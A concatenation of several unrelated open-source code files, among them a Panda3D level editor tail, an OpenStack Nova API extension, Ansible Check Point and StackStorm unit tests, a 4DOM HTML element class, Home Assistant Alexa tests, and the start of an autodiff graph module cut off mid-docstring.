# In this function we will restore the change and let side window know
# the hot-key ahs been pushed.
################################################################
if self.sideWindow != None:
self.sideWindow.toggleBackfaceFromMainW()
else:
self.backface = (self.backface+1)%2
def toggleTexture(self):
################################################################
# toggleTexture(self)
# This function will be called when user use the hot-key to change the
# world setting. (From seSession)
# In this function we will restore the change and let side window know
# the hot-key ahs been pushed.
################################################################
if self.sideWindow != None:
self.sideWindow.toggleTextureFromMainW()
else:
self.texture = (self.texture+1)%2
def toggleWireframe(self):
################################################################
# toggleWireframe(self)
# This function will be called when user use the hot-key to change the
# world setting. (From seSession)
# In this function we will restore the change and let side window know
# the hot-key ahs been pushed.
################################################################
if self.sideWindow != None:
self.sideWindow.toggleWireframeFromMainW()
else:
self.wireframe = (self.wireframe+1)%2
def openAlignPanel(self, nodePath=None):
name = nodePath.getName()
if not self.alignPanelDict.has_key(name):
list = AllScene.getAllObjNameAsList()
if name in list:
list.remove(name)
else:
return
self.alignPanelDict[name] = AlignTool(nodePath = nodePath, list = list)
return
def closeAlignPanel(self, name=None):
if self.alignPanelDict.has_key(name):
del self.alignPanelDict[name]
def alignObject(self, nodePath, name, list):
target = AllScene.getObjFromSceneByName(name)
pos = target.getPos()
hpr = target.getHpr()
scale = target.getScale()
if list[0]: # Align X
nodePath.setX(pos.getX())
if list[1]: # Align Y
nodePath.setY(pos.getY())
if list[2]: # Align Z
nodePath.setZ(pos.getZ())
if list[3]: # Align H
nodePath.setH(hpr.getX())
if list[4]: # Align P
nodePath.setP(hpr.getY())
if list[5]: # Align R
nodePath.setR(hpr.getZ())
if list[6]: # Scale X
nodePath.setSx(scale.getX())
if list[7]: # Scale Y
nodePath.setSy(scale.getY())
if list[8]: # Scale Z
nodePath.setSz(scale.getZ())
return
### Event from Motion Path Panel
def requestCurveList(self, nodePath,name):
curveList = AllScene.getCurveList(nodePath)
messenger.send('curveListFor'+name, [curveList])
## Steal from DirectSession...
    def flash(self, nodePath = 'None Given'):
        """ Highlight an object by setting it red for a few seconds """
        # (Borrowed from DirectSession.)  The string default 'None Given'
        # distinguishes "no argument" from an explicit None/empty node.
        # Clean up any existing task
        taskMgr.remove('flashNodePath')
        # Spawn new task if appropriate
        if nodePath == 'None Given':
            # If nothing specified, try selected node path
            nodePath = self.selected.last
        if nodePath:
            if nodePath.hasColor():
                # Flash with the inverse of the current color so the change
                # is visible whatever the node looks like.
                doneColor = nodePath.getColor()
                flashColor = VBase4(1) - doneColor
                flashColor.setW(1)
            else:
                # No explicit color set: flash red, restore by clearing.
                doneColor = None
                flashColor = VBase4(1,0,0,1)
            # Temporarily set node path color
            nodePath.setColor(flashColor)
            # Clean up color in a few seconds
            t = taskMgr.doMethodLater(1.5,
                                      # This is just a dummy task
                                      self.flashDummy,
                                      'flashNodePath')
            # Stash restore info on the task object for flashDone.
            t.nodePath = nodePath
            t.doneColor = doneColor
            # This really does all the work
            t.uponDeath = self.flashDone
    def flashDummy(self, state):
        # Dummy task body: the actual color restore happens in the task's
        # uponDeath handler (flashDone); this just lets the task expire.
        return Task.done
def flashDone(self,state):
# Return node Path to original state
if state.nodePath.isEmpty():
# Node path doesn't exist anymore, bail
return
if state.doneColor:
state.nodePath.setColor(state.doneColor)
else:
state.nodePath.clearColor()
# Script entry point: build the editor inside the Tk root window and enter
# Panda3D's main loop (run() never returns).
editor = myLevelEditor(parent = base.tkRoot)
run()
| bsd-3-clause |
nikesh-mahalka/nova | nova/api/openstack/compute/flavor_rxtx.py | 33 | 2097 | # Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The Flavor Rxtx API extension."""
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
# Extension alias used in API URLs and policy rule names.
ALIAS = 'os-flavor-rxtx'
# Policy-check helper scoped to this extension's alias ("soft": callers test
# the returned boolean -- TODO confirm against nova.api.openstack.extensions).
authorize = extensions.os_compute_soft_authorizer(ALIAS)
class FlavorRxtxController(wsgi.Controller):
    """Injects the ``rxtx_factor`` key into flavor API responses."""

    def _extend_flavors(self, req, flavors):
        # Copy each flavor's rxtx_factor from the DB record cached on the
        # request; unset factors are rendered as an empty string.
        for flavor in flavors:
            db_flavor = req.get_db_flavor(flavor['id'])
            flavor['rxtx_factor'] = db_flavor['rxtx_factor'] or ""

    def _show(self, req, resp_obj):
        # Skip silently when policy denies the extension for this context.
        if not authorize(req.environ['nova.context']):
            return
        if 'flavor' in resp_obj.obj:
            self._extend_flavors(req, [resp_obj.obj['flavor']])

    @wsgi.extends
    def show(self, req, resp_obj, id):
        return self._show(req, resp_obj)

    @wsgi.extends(action='create')
    def create(self, req, resp_obj, body):
        return self._show(req, resp_obj)

    @wsgi.extends
    def detail(self, req, resp_obj):
        if not authorize(req.environ['nova.context']):
            return
        self._extend_flavors(req, list(resp_obj.obj['flavors']))
class FlavorRxtx(extensions.V21APIExtensionBase):
    """Support to show the rxtx status of a flavor."""

    name = "FlavorRxtx"
    alias = ALIAS
    version = 1

    def get_controller_extensions(self):
        # Attach FlavorRxtxController to the core 'flavors' resource.
        extension = extensions.ControllerExtension(
            self, 'flavors', FlavorRxtxController())
        return [extension]

    def get_resources(self):
        # This extension contributes no standalone resources.
        return []
| apache-2.0 |
simonwydooghe/ansible | test/units/modules/network/check_point/test_cp_mgmt_security_zone_facts.py | 19 | 2864 | # Ansible module to manage CheckPoint Firewall (c) 2019
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import pytest
from units.modules.utils import set_module_args, exit_json, fail_json, AnsibleExitJson
from ansible.module_utils import basic
from ansible.modules.network.check_point import cp_mgmt_security_zone_facts
# Canned "show security-zones" API response (uid-level details).
OBJECT = {
    "from": 1,
    "to": 1,
    "total": 6,
    "objects": [
        "53de74b7-8f19-4cbe-99fc-a81ef0759bad"
    ]
}
# Module arguments for listing zones with minimal detail.
SHOW_PLURAL_PAYLOAD = {
    'limit': 1,
    'details_level': 'uid'
}
# Module arguments naming an object that the mocked API will 404 on.
SHOW_SINGLE_PAYLOAD = {
    'name': 'object_which_is_not_exist'
}
api_call_object = 'security-zone'
api_call_object_plural_version = 'security-zones'
# Raw error body the mocked API returns for the missing object.
failure_msg = '''{u'message': u'Requested object [object_which_is_not_exist] not found', u'code': u'generic_err_object_not_found'}'''
class TestCheckpointSecurityZoneFacts(object):
    """Unit tests for the cp_mgmt_security_zone_facts module."""
    # Module under test.
    module = cp_mgmt_security_zone_facts
    @pytest.fixture(autouse=True)
    def module_mock(self, mocker):
        # Replace AnsibleModule's exit/fail handlers with versions that raise
        # capturable exceptions instead of calling sys.exit().
        return mocker.patch.multiple(basic.AnsibleModule, exit_json=exit_json, fail_json=fail_json)
    @pytest.fixture
    def connection_mock(self, mocker):
        # Mock the HTTP-API Connection used to reach the Check Point manager.
        connection_class_mock = mocker.patch('ansible.module_utils.network.checkpoint.checkpoint.Connection')
        return connection_class_mock.return_value
    def test_show_single_object_which_is_not_exist(self, mocker, connection_mock):
        """A 404 from the API must surface as a module failure carrying the API message."""
        connection_mock.send_request.return_value = (404, failure_msg)
        try:
            result = self._run_module(SHOW_SINGLE_PAYLOAD)
        except Exception as e:
            # fail_json raises; the failure payload is the first argument.
            result = e.args[0]
        assert result['failed']
        assert 'Checkpoint device returned error 404 with message ' + failure_msg == result['msg']
    def test_show_few_objects(self, mocker, connection_mock):
        """A 200 list response is exposed unchanged under ansible_facts."""
        connection_mock.send_request.return_value = (200, OBJECT)
        result = self._run_module(SHOW_PLURAL_PAYLOAD)
        assert not result['changed']
        assert OBJECT == result['ansible_facts'][api_call_object_plural_version]
    def _run_module(self, module_args):
        # Helper: run the module's main() and return the captured exit payload.
        set_module_args(module_args)
        with pytest.raises(AnsibleExitJson) as ex:
            self.module.main()
        return ex.value.args[0]
| gpl-3.0 |
pixelrebel/st2 | st2common/tests/unit/test_json_schema.py | 8 | 14816 | # Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest2 import TestCase
from jsonschema.exceptions import ValidationError
from st2common.util import schema as util_schema
# Schema with a mix of required/optional, untyped, multi-typed and
# collection-typed arguments -- none of which declare defaults.
#
# NOTE: three descriptions below previously used SQL-style '' escaping
# ('Who''s ...'); in Python that is adjacent-string concatenation and
# silently produced "Whos ...".  Fixed to real apostrophes.
TEST_SCHEMA_1 = {
    'additionalProperties': False,
    'title': 'foo',
    'description': 'Foo.',
    'type': 'object',
    'properties': {
        'arg_required_no_default': {
            'description': 'Foo',
            'required': True,
            'type': 'string'
        },
        'arg_optional_no_type': {
            'description': 'Bar'
        },
        'arg_optional_multi_type': {
            'description': 'Mirror mirror',
            'type': ['string', 'boolean', 'number']
        },
        'arg_optional_multi_type_none': {
            'description': 'Mirror mirror on the wall',
            'type': ['string', 'boolean', 'number', 'null']
        },
        'arg_optional_type_array': {
            'description': "Who's the fairest?",
            'type': 'array'
        },
        'arg_optional_type_object': {
            'description': "Who's the fairest of them?",
            'type': 'object'
        },
        'arg_optional_multi_collection_type': {
            'description': "Who's the fairest of them all?",
            'type': ['array', 'object']
        }
    }
}

# Schema with a single required argument that does declare a default.
TEST_SCHEMA_2 = {
    'additionalProperties': False,
    'title': 'foo',
    'description': 'Foo.',
    'type': 'object',
    'properties': {
        'arg_required_default': {
            'default': 'date',
            'description': 'Foo',
            'required': True,
            'type': 'string'
        }
    }
}

# Optional single-typed arguments: with a default, with an explicit
# default of None, and with no default at all.
TEST_SCHEMA_3 = {
    'additionalProperties': False,
    'title': 'foo',
    'description': 'Foo.',
    'type': 'object',
    'properties': {
        'arg_optional_default': {
            'default': 'bar',
            'description': 'Foo',
            'type': 'string'
        },
        'arg_optional_default_none': {
            'default': None,
            'description': 'Foo',
            'type': 'string'
        },
        'arg_optional_no_default': {
            'description': 'Foo',
            'type': 'string'
        }
    }
}

# Same shapes as TEST_SCHEMA_3 but expressed with `anyOf`, plus one
# property whose anyOf explicitly admits null.
TEST_SCHEMA_4 = {
    'additionalProperties': False,
    'title': 'foo',
    'description': 'Foo.',
    'type': 'object',
    'properties': {
        'arg_optional_default': {
            'default': 'bar',
            'description': 'Foo',
            'anyOf': [
                {'type': 'string'},
                {'type': 'boolean'}
            ]
        },
        'arg_optional_default_none': {
            'default': None,
            'description': 'Foo',
            'anyOf': [
                {'type': 'string'},
                {'type': 'boolean'}
            ]
        },
        'arg_optional_no_default': {
            'description': 'Foo',
            'anyOf': [
                {'type': 'string'},
                {'type': 'boolean'}
            ]
        },
        'arg_optional_no_default_anyof_none': {
            'description': 'Foo',
            'anyOf': [
                {'type': 'string'},
                {'type': 'boolean'},
                {'type': 'null'}
            ]
        }
    }
}

# Same shapes as TEST_SCHEMA_4 but expressed with `oneOf`.
TEST_SCHEMA_5 = {
    'additionalProperties': False,
    'title': 'foo',
    'description': 'Foo.',
    'type': 'object',
    'properties': {
        'arg_optional_default': {
            'default': 'bar',
            'description': 'Foo',
            'oneOf': [
                {'type': 'string'},
                {'type': 'boolean'}
            ]
        },
        'arg_optional_default_none': {
            'default': None,
            'description': 'Foo',
            'oneOf': [
                {'type': 'string'},
                {'type': 'boolean'}
            ]
        },
        'arg_optional_no_default': {
            'description': 'Foo',
            'oneOf': [
                {'type': 'string'},
                {'type': 'boolean'}
            ]
        },
        'arg_optional_no_default_oneof_none': {
            'description': 'Foo',
            'oneOf': [
                {'type': 'string'},
                {'type': 'boolean'},
                {'type': 'null'}
            ]
        }
    }
}
class JSONSchemaTestCase(TestCase):
    """Tests for st2common.util.schema validation helpers and the
    type-introspection predicates (single/anyOf/oneOf/list/nullable)."""
    def test_use_default_value(self):
        """Required-without-default must fail when absent; defaults fill in."""
        # No default, no value provided, should fail
        instance = {}
        validator = util_schema.get_validator()
        expected_msg = '\'arg_required_no_default\' is a required property'
        self.assertRaisesRegexp(ValidationError, expected_msg, util_schema.validate,
                                instance=instance, schema=TEST_SCHEMA_1, cls=validator,
                                use_default=True)
        # No default, value provided
        instance = {'arg_required_no_default': 'foo'}
        util_schema.validate(instance=instance, schema=TEST_SCHEMA_1, cls=validator,
                             use_default=True)
        # default value provided, no value, should pass
        instance = {}
        validator = util_schema.get_validator()
        util_schema.validate(instance=instance, schema=TEST_SCHEMA_2, cls=validator,
                             use_default=True)
        # default value provided, value provided, should pass
        instance = {'arg_required_default': 'foo'}
        validator = util_schema.get_validator()
        util_schema.validate(instance=instance, schema=TEST_SCHEMA_2, cls=validator,
                             use_default=True)
    def test_allow_default_none(self):
        """Single-typed properties: defaults (incl. None) pass with allow_default_none."""
        # Let validator take care of default
        validator = util_schema.get_validator()
        util_schema.validate(instance=dict(), schema=TEST_SCHEMA_3, cls=validator,
                             use_default=True, allow_default_none=True)
    def test_allow_default_explicit_none(self):
        """Single-typed properties: explicit None values pass with allow_default_none."""
        # Explicitly pass None to arguments
        instance = {
            'arg_optional_default': None,
            'arg_optional_default_none': None,
            'arg_optional_no_default': None
        }
        validator = util_schema.get_validator()
        util_schema.validate(instance=instance, schema=TEST_SCHEMA_3, cls=validator,
                             use_default=True, allow_default_none=True)
    def test_anyof_type_allow_default_none(self):
        """anyOf-typed properties: defaults pass with allow_default_none."""
        # Let validator take care of default
        validator = util_schema.get_validator()
        util_schema.validate(instance=dict(), schema=TEST_SCHEMA_4, cls=validator,
                             use_default=True, allow_default_none=True)
    def test_anyof_allow_default_explicit_none(self):
        """anyOf-typed properties: explicit None values pass with allow_default_none."""
        # Explicitly pass None to arguments
        instance = {
            'arg_optional_default': None,
            'arg_optional_default_none': None,
            'arg_optional_no_default': None,
            'arg_optional_no_default_anyof_none': None
        }
        validator = util_schema.get_validator()
        util_schema.validate(instance=instance, schema=TEST_SCHEMA_4, cls=validator,
                             use_default=True, allow_default_none=True)
    def test_oneof_type_allow_default_none(self):
        """oneOf-typed properties: defaults pass with allow_default_none."""
        # Let validator take care of default
        validator = util_schema.get_validator()
        util_schema.validate(instance=dict(), schema=TEST_SCHEMA_5, cls=validator,
                             use_default=True, allow_default_none=True)
    def test_oneof_allow_default_explicit_none(self):
        """oneOf-typed properties: explicit None values pass with allow_default_none."""
        # Explicitly pass None to arguments
        instance = {
            'arg_optional_default': None,
            'arg_optional_default_none': None,
            'arg_optional_no_default': None,
            'arg_optional_no_default_oneof_none': None
        }
        validator = util_schema.get_validator()
        util_schema.validate(instance=instance, schema=TEST_SCHEMA_5, cls=validator,
                             use_default=True, allow_default_none=True)
    def test_is_property_type_single(self):
        """is_property_type_single: true only for plain (or missing) 'type'."""
        typed_property = TEST_SCHEMA_1['properties']['arg_required_no_default']
        self.assertTrue(util_schema.is_property_type_single(typed_property))
        untyped_property = TEST_SCHEMA_1['properties']['arg_optional_no_type']
        self.assertTrue(util_schema.is_property_type_single(untyped_property))
        multi_typed_property = TEST_SCHEMA_1['properties']['arg_optional_multi_type']
        self.assertFalse(util_schema.is_property_type_single(multi_typed_property))
        anyof_property = TEST_SCHEMA_4['properties']['arg_optional_default']
        self.assertFalse(util_schema.is_property_type_single(anyof_property))
        oneof_property = TEST_SCHEMA_5['properties']['arg_optional_default']
        self.assertFalse(util_schema.is_property_type_single(oneof_property))
    def test_is_property_type_anyof(self):
        """is_property_type_anyof: true only for properties using 'anyOf'."""
        anyof_property = TEST_SCHEMA_4['properties']['arg_optional_default']
        self.assertTrue(util_schema.is_property_type_anyof(anyof_property))
        typed_property = TEST_SCHEMA_1['properties']['arg_required_no_default']
        self.assertFalse(util_schema.is_property_type_anyof(typed_property))
        untyped_property = TEST_SCHEMA_1['properties']['arg_optional_no_type']
        self.assertFalse(util_schema.is_property_type_anyof(untyped_property))
        multi_typed_property = TEST_SCHEMA_1['properties']['arg_optional_multi_type']
        self.assertFalse(util_schema.is_property_type_anyof(multi_typed_property))
        oneof_property = TEST_SCHEMA_5['properties']['arg_optional_default']
        self.assertFalse(util_schema.is_property_type_anyof(oneof_property))
    def test_is_property_type_oneof(self):
        """is_property_type_oneof: true only for properties using 'oneOf'."""
        oneof_property = TEST_SCHEMA_5['properties']['arg_optional_default']
        self.assertTrue(util_schema.is_property_type_oneof(oneof_property))
        typed_property = TEST_SCHEMA_1['properties']['arg_required_no_default']
        self.assertFalse(util_schema.is_property_type_oneof(typed_property))
        untyped_property = TEST_SCHEMA_1['properties']['arg_optional_no_type']
        self.assertFalse(util_schema.is_property_type_oneof(untyped_property))
        multi_typed_property = TEST_SCHEMA_1['properties']['arg_optional_multi_type']
        self.assertFalse(util_schema.is_property_type_oneof(multi_typed_property))
        anyof_property = TEST_SCHEMA_4['properties']['arg_optional_default']
        self.assertFalse(util_schema.is_property_type_oneof(anyof_property))
    def test_is_property_type_list(self):
        """is_property_type_list: true only when 'type' is a list of types."""
        multi_typed_property = TEST_SCHEMA_1['properties']['arg_optional_multi_type']
        self.assertTrue(util_schema.is_property_type_list(multi_typed_property))
        typed_property = TEST_SCHEMA_1['properties']['arg_required_no_default']
        self.assertFalse(util_schema.is_property_type_list(typed_property))
        untyped_property = TEST_SCHEMA_1['properties']['arg_optional_no_type']
        self.assertFalse(util_schema.is_property_type_list(untyped_property))
        anyof_property = TEST_SCHEMA_4['properties']['arg_optional_default']
        self.assertFalse(util_schema.is_property_type_list(anyof_property))
        oneof_property = TEST_SCHEMA_5['properties']['arg_optional_default']
        self.assertFalse(util_schema.is_property_type_list(oneof_property))
    def test_is_property_nullable(self):
        """is_property_nullable: true when 'null' appears in type/anyOf/oneOf."""
        multi_typed_prop_nullable = TEST_SCHEMA_1['properties']['arg_optional_multi_type_none']
        self.assertTrue(util_schema.is_property_nullable(multi_typed_prop_nullable.get('type')))
        anyof_property_nullable = TEST_SCHEMA_4['properties']['arg_optional_no_default_anyof_none']
        self.assertTrue(util_schema.is_property_nullable(anyof_property_nullable.get('anyOf')))
        oneof_property_nullable = TEST_SCHEMA_5['properties']['arg_optional_no_default_oneof_none']
        self.assertTrue(util_schema.is_property_nullable(oneof_property_nullable.get('oneOf')))
        typed_property = TEST_SCHEMA_1['properties']['arg_required_no_default']
        self.assertFalse(util_schema.is_property_nullable(typed_property))
        multi_typed_property = TEST_SCHEMA_1['properties']['arg_optional_multi_type']
        self.assertFalse(util_schema.is_property_nullable(multi_typed_property.get('type')))
        anyof_property = TEST_SCHEMA_4['properties']['arg_optional_no_default']
        self.assertFalse(util_schema.is_property_nullable(anyof_property.get('anyOf')))
        oneof_property = TEST_SCHEMA_5['properties']['arg_optional_no_default']
        self.assertFalse(util_schema.is_property_nullable(oneof_property.get('oneOf')))
    def test_is_attribute_type_array(self):
        """is_attribute_type_array: true when 'array' is (among) the type(s)."""
        multi_coll_typed_prop = TEST_SCHEMA_1['properties']['arg_optional_multi_collection_type']
        self.assertTrue(util_schema.is_attribute_type_array(multi_coll_typed_prop.get('type')))
        array_type_property = TEST_SCHEMA_1['properties']['arg_optional_type_array']
        self.assertTrue(util_schema.is_attribute_type_array(array_type_property.get('type')))
        multi_non_coll_prop = TEST_SCHEMA_1['properties']['arg_optional_multi_type']
        self.assertFalse(util_schema.is_attribute_type_array(multi_non_coll_prop.get('type')))
        object_type_property = TEST_SCHEMA_1['properties']['arg_optional_type_object']
        self.assertFalse(util_schema.is_attribute_type_array(object_type_property.get('type')))
    def test_is_attribute_type_object(self):
        """is_attribute_type_object: true when 'object' is (among) the type(s)."""
        multi_coll_typed_prop = TEST_SCHEMA_1['properties']['arg_optional_multi_collection_type']
        self.assertTrue(util_schema.is_attribute_type_object(multi_coll_typed_prop.get('type')))
        object_type_property = TEST_SCHEMA_1['properties']['arg_optional_type_object']
        self.assertTrue(util_schema.is_attribute_type_object(object_type_property.get('type')))
        multi_non_coll_prop = TEST_SCHEMA_1['properties']['arg_optional_multi_type']
        self.assertFalse(util_schema.is_attribute_type_object(multi_non_coll_prop.get('type')))
        array_type_property = TEST_SCHEMA_1['properties']['arg_optional_type_array']
        self.assertFalse(util_schema.is_attribute_type_object(array_type_property.get('type')))
| apache-2.0 |
muadibbm/gini | backend/src/gloader/xml/dom/html/HTMLElement.py | 10 | 3572 | ########################################################################
#
# File Name: HTMLElement.py
#
#
"""
WWW: http://4suite.com/4DOM e-mail: support@4suite.com
Copyright (c) 2000 Fourthought Inc, USA. All Rights Reserved.
See http://4suite.com/COPYRIGHT for license and copyright information
"""
from xml.dom.Element import Element
from xml.dom import EMPTY_NAMESPACE, EMPTY_PREFIX
import string
class HTMLElement(Element):
    """Base DOM class for all HTML elements (DOM Level 1 HTMLElement).

    HTML is case-insensitive, so 4DOM normalizes tag and attribute names
    to upper case -- which is why every accessor below upper-cases the
    name it is given.  Python 2 era code (string module, has_key).
    """
    def __init__(self, ownerDocument, nodeName):
        tagName = string.upper(nodeName)
        Element.__init__(self, ownerDocument, tagName,
                         EMPTY_NAMESPACE, EMPTY_PREFIX,tagName)
    ### Attribute Methods ###
    # Accessors for the core HTML attributes shared by all elements.
    def _get_id(self):
        return self.getAttribute('ID')
    def _set_id(self,ID):
        self.setAttribute('ID',ID)
    def _get_title(self):
        return self.getAttribute('TITLE')
    def _set_title(self,title):
        self.setAttribute('TITLE',title)
    def _get_lang(self):
        return self.getAttribute('LANG')
    def _set_lang(self,lang):
        self.setAttribute('LANG',lang)
    def _get_dir(self):
        return self.getAttribute('DIR')
    def _set_dir(self,dir):
        self.setAttribute('DIR',dir)
    def _get_className(self):
        return self.getAttribute('CLASSNAME')
    def _set_className(self,className):
        self.setAttribute('CLASSNAME',className)
    ### Overridden Methods ###
    # Case-insensitive variants of the generic Element attribute API.
    def getAttribute(self, name):
        attr = self.attributes.getNamedItem(string.upper(name))
        return attr and attr.value or ''
    def getAttributeNode(self, name):
        return self.attributes.getNamedItem(string.upper(name))
    def getElementsByTagName(self, tagName):
        return Element.getElementsByTagName(self, string.upper(tagName))
    def hasAttribute(self, name):
        return self.attributes.getNamedItem(string.upper(name)) is not None
    def removeAttribute(self, name):
        attr = self.attributes.getNamedItem(string.upper(name))
        # Short-circuit: only remove when the attribute actually exists.
        attr and self.removeAttributeNode(attr)
    def setAttribute(self, name, value):
        Element.setAttribute(self, string.upper(name), value)
    def _4dom_validateString(self, value):
        # HTML attribute values need no extra validation here.
        return value
    ### Helper Functions For Cloning ###
    def _4dom_clone(self, owner):
        # Shallow clone: copy the element and its attribute nodes into the
        # given owner document (children are handled by the caller).
        e = self.__class__(owner,
                           self.tagName)
        for attr in self.attributes:
            clone = attr._4dom_clone(owner)
            if clone.localName is None:
                e.attributes.setNamedItem(clone)
            else:
                e.attributes.setNamedItemNS(clone)
            clone._4dom_setOwnerElement(self)
        return e
    def __getinitargs__(self):
        # Support copy/pickle by reporting the constructor arguments.
        return (self.ownerDocument,
                self.tagName
                )
    ### Attribute Access Mappings ###
    # Computed-attribute dispatch tables consulted by 4DOM's __getattr__/
    # __setattr__ machinery; they extend the tables inherited from Element.
    _readComputedAttrs = Element._readComputedAttrs.copy()
    _readComputedAttrs.update ({
         'id'            : _get_id,
         'title'         : _get_title,
         'lang'          : _get_lang,
         'dir'           : _get_dir,
         'className'     : _get_className,
        })
    _writeComputedAttrs = Element._writeComputedAttrs.copy()
    _writeComputedAttrs.update ({
         'id'            : _set_id,
         'title'         : _set_title,
         'lang'          : _set_lang,
         'dir'           : _set_dir,
         'className'     : _set_className,
        })
    # Read-only attrs: everything readable that has no writer.
    _readOnlyAttrs = filter(lambda k,m=_writeComputedAttrs: not m.has_key(k),
                            Element._readOnlyAttrs + _readComputedAttrs.keys())
| mit |
qedi-r/home-assistant | tests/components/alexa/test_flash_briefings.py | 4 | 3680 | """The tests for the Alexa component."""
# pylint: disable=protected-access
import asyncio
import datetime
import pytest
from homeassistant.core import callback
from homeassistant.setup import async_setup_component
from homeassistant.components import alexa
from homeassistant.components.alexa import const
# Canned Alexa identifiers shaped like the ones the real service sends.
SESSION_ID = "amzn1.echo-api.session.0000000-0000-0000-0000-00000000000"
APPLICATION_ID = "amzn1.echo-sdk-ams.app.000000-d0ed-0000-ad00-000000d00ebe"
REQUEST_ID = "amzn1.echo-api.request.0000000-0000-0000-0000-00000000000"
# pylint: disable=invalid-name
# Service calls recorded by the mock service registered in alexa_client.
calls = []
NPR_NEWS_MP3_URL = "https://pd.npr.org/anon.npr-mp3/npr/news/newscast.mp3"
@pytest.fixture
def alexa_client(loop, hass, hass_client):
    """Initialize a Home Assistant server for testing this module."""

    @callback
    def mock_service(call):
        # Record every "test.alexa" service call so tests can assert on them.
        calls.append(call)

    hass.services.async_register("test", "alexa", mock_service)

    # Set up the alexa integration with two flash-briefing feeds: a
    # multi-item text briefing ("weather") and an audio one ("news_audio").
    assert loop.run_until_complete(
        async_setup_component(
            hass,
            alexa.DOMAIN,
            {
                # Key is here to verify we allow other keys in config too
                "homeassistant": {},
                "alexa": {
                    "flash_briefings": {
                        "weather": [
                            {
                                "title": "Weekly forecast",
                                "text": "This week it will be sunny.",
                            },
                            {
                                "title": "Current conditions",
                                "text": "Currently it is 80 degrees fahrenheit.",
                            },
                        ],
                        "news_audio": {
                            "title": "NPR",
                            "audio": NPR_NEWS_MP3_URL,
                            "display_url": "https://npr.org",
                            "uid": "uuid",
                        },
                    }
                },
            },
        )
    )
    # Return a test HTTP client bound to this hass instance.
    return loop.run_until_complete(hass_client())
def _flash_briefing_req(client, briefing_id):
return client.get("/api/alexa/flash_briefings/{}".format(briefing_id))
@asyncio.coroutine
def test_flash_briefing_invalid_id(alexa_client):
    """Test an invalid Flash Briefing ID."""
    # Unknown briefing IDs must yield a 404 with an empty body.
    req = yield from _flash_briefing_req(alexa_client, 10000)
    assert req.status == 404
    text = yield from req.text()
    assert text == ""
@asyncio.coroutine
def test_flash_briefing_date_from_str(alexa_client):
    """Test the response has a valid date parsed from string."""
    req = yield from _flash_briefing_req(alexa_client, "weather")
    assert req.status == 200
    data = yield from req.json()
    # updateDate must round-trip through the Alexa-required timestamp format.
    assert isinstance(
        datetime.datetime.strptime(
            data[0].get(const.ATTR_UPDATE_DATE), const.DATE_FORMAT
        ),
        datetime.datetime,
    )
@asyncio.coroutine
def test_flash_briefing_valid(alexa_client):
    """Test the response is valid."""
    # Expected payload for the "news_audio" briefing configured in the fixture.
    data = [
        {
            "titleText": "NPR",
            "redirectionURL": "https://npr.org",
            "streamUrl": NPR_NEWS_MP3_URL,
            "mainText": "",
            "uid": "uuid",
            "updateDate": "2016-10-10T19:51:42.0Z",
        }
    ]

    req = yield from _flash_briefing_req(alexa_client, "news_audio")
    assert req.status == 200
    json = yield from req.json()

    # The timestamp is generated at request time, so only validate its format...
    assert isinstance(
        datetime.datetime.strptime(
            json[0].get(const.ATTR_UPDATE_DATE), const.DATE_FORMAT
        ),
        datetime.datetime,
    )

    # ...then compare the remaining fields exactly.
    json[0].pop(const.ATTR_UPDATE_DATE)
    data[0].pop(const.ATTR_UPDATE_DATE)
    assert json == data
| apache-2.0 |
upul/Aurora | aurora/autodiff/autodiff.py | 1 | 21346 | import numpy as np
try:
from aurora.ndarray import gpu_op, ndarray
except ImportError:
pass
class Node(object):
    """ Node object represents a node in the computational graph"""

    def __init__(self):
        """ New node will be created by Op objects __call__ method"""
        # list of inputs to this node
        self.inputs = []
        # operator
        self.op = None
        # constants
        self.const = None
        # name of the node mainly use for debugging
        self.name = ""

    def __add__(self, other):
        """ Adding two nodes and returns a new node"""
        # Node + Node builds an AddOp node; Node + scalar an AddByConstOp node.
        if isinstance(other, Node):
            return add(self, other)
        else:
            return add_const(self, other)

    def __sub__(self, other):
        # Node - Node vs Node - scalar.
        if isinstance(other, Node):
            return sub(self, other)
        else:
            return sub_const(self, other)

    def __rsub__(self, other):
        # Reflected subtraction: scalar - Node.
        return ref_sub_const(self, other)

    def __mul__(self, other):
        if isinstance(other, Node):
            return mul(self, other)
        else:
            return mul_const(self, other)

    def __truediv__(self, other):
        if isinstance(other, Node):
            return div(self, other)
        else:
            return div_const(self, other)

    # Allow left-hand-side add and multiply.
    __radd__ = __add__
    __rmul__ = __mul__
    # NOTE(review): Python 3 never calls __rdiv__; reflected division
    # (scalar / Node) would need __rtruediv__, and aliasing __truediv__ does
    # not swap the operands -- confirm intended behaviour.
    __rdiv__ = __truediv__
class Op(object):
    """ Op class represents operations perform on nodes"""

    def __call__(self):
        """
        Create a new node which represents operations perform on the graph

        Parameters
        ----------
        None

        Returns
        -------
        Node
            The new node object
        """
        new_node = Node()
        new_node.op = self
        return new_node

    def compute(self, node, input_vals, output_val, use_numpy=True):
        """
        Given the values of input nodes, compute the output value

        Parameters
        ----------
        :type use_numpy: object
        :param use_numpy: True selects the NumPy path, False the GPU path
        :param node: Node that performs the computation
